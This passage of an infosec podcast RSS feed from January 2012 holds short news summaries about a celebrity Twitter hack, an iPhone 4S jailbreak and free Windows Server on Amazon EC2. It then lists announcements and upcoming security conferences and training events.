<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Those tweets have also been deleted, but Kutcher&#39;s one warning remains. Whoops, it seems the not-too-smart social media hacker may be about to be Punk&#39;d.</span><img height="565px;" src="https://lh5.googleusercontent.com/qCBl5INlD7uRFLv0TjOwmTAjxDEqmU9ZUnQpNmRirmzC-vbZMn7Ek96eELYKJD6zjfw__x82jmYiUf75eY5Obgh27XD-lCOXZAkEEUXfbsg4DuYhjK4" width="675px;" /></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&#39;s certainly not the first time Kutcher&#39;s Twitter account has been compromised, but as an angel investor in many tech projects including Foursquare, it&#39;s unknown if this hack might be additionally embarrassing for him. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;</span><a href="http://venturebeat.com/2012/01/16/iphone-4s-untethered-jailbreak/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://venturebeat.com/2012/01/16/iphone-4s-untethered-jailbreak/</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It&rsquo;s taken longer than usual for hackers to release a complete jailbreak for the iPhone 4S, but it looks like one is almost here.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The above video by iOS hacker pod2G shows a fully untethered jailbreak &mdash; meaning the jailbreak is retained even after you reboot the phone &mdash; on an iPhone 4S running iOS 5.0.1. &ldquo;Only a few to wait now,&rdquo;</span><a href="http://pod2g-ios.blogspot.com/2012/01/4s-jailbreak.html"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">pod2G wrote on his blog</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, hinting that the hack is almost ready for release.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Jailbreaking your iPhone allows you to run unauthorized apps and customize your phone in an assortment of ways. It&rsquo;s a direct affront to Apple&rsquo;s heavily locked-down app ecosystem, so the company has made each new hardware and software release more difficult for hackers to jailbreak.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The iPhone 4S jailbreak was created by Dhowett of the hacker collective Chronic Dev Team. Pod2G was also responsible for the untethered iOS 5.0.1 jailbreak for devices other than the iPad 2 and iPhone 4S.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-30685_3-57359663-264/free-windows-servers-float-onto-amazons-cloud"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-30685_3-57359663-264/free-windows-servers-float-onto-amazons-cloud</span></a></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone can download Linux for free, so it was no surprise that Amazon offered the open-source operating system on the free tier of Amazon Web Services.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But now the company has added a free version of Windows Server to the Elastic Compute Cloud (EC2) service, too.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We are excited to announce that starting today, the AWS Free Usage Tier will now include Amazon EC2 instances running Microsoft Windows Server,&quot; Amazon told EC2 customers today. &quot;Customers eligible for the AWS Free Usage tier can now use up to 750 hours per month of t1.micro instances running Microsoft Windows Server for free.&quot;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The offering competes directly with Microsoft&#39;s own Azure service. But it also serves to ensure that people just getting started with cloud computing will have Windows as an option.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-570-blackout-no-uefi-register-hijack-targeting-kids-dude-wheres-my-twitter-iphone-4s-jailbreak-near-windows-cloud/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3387/0/infosec-daily-podcast-episode-570.mp3" length="18463491" type="audio/mpeg" />
		<itunes:duration>0:38:25</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered [...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 570 for January 17, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Themson Mester.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Anti PIPA/SOPA Meetup
	When: January 18, 2012
	Where: NY Tech Meetup HQ, New York City
	http://www.meetup.com/ny-tech/events/47879702/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	BSides Chicago
	When: Saturday, April 28th, 2012
	Where: Volcano Room (further info coming)
	Cost: Free (as always!) &#8211; Registration opening soon!
	http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012
	They&#8217;re looking for sponsors, so if you know someone, pass it on.
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 569 &#8211; Happy MLK, Death of SOPA?, DataExfil, Norton Source Code, Zappos, &amp; TeaMp0isoN</title>
		<link>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison</link>
		<comments>http://www.isdpodcast.com/episode-569-happy-mlk-death-of-sopa-dataexfil-norton-source-code-zappos-teamp0ison#comments</comments>
		<pubDate>Tue, 17 Jan 2012 01:50:00 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3382</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 569 for January 16, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 569 for January 16, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anti PIPA/SOPA Meetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#222222;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 18, 2012<br class="kix-line-break" /><br />
	Where: NY Tech Meetup HQ, New York City</span><br />
	<a href="http://www.meetup.com/ny-tech/events/47879702/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.meetup.com/ny-tech/events/47879702/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
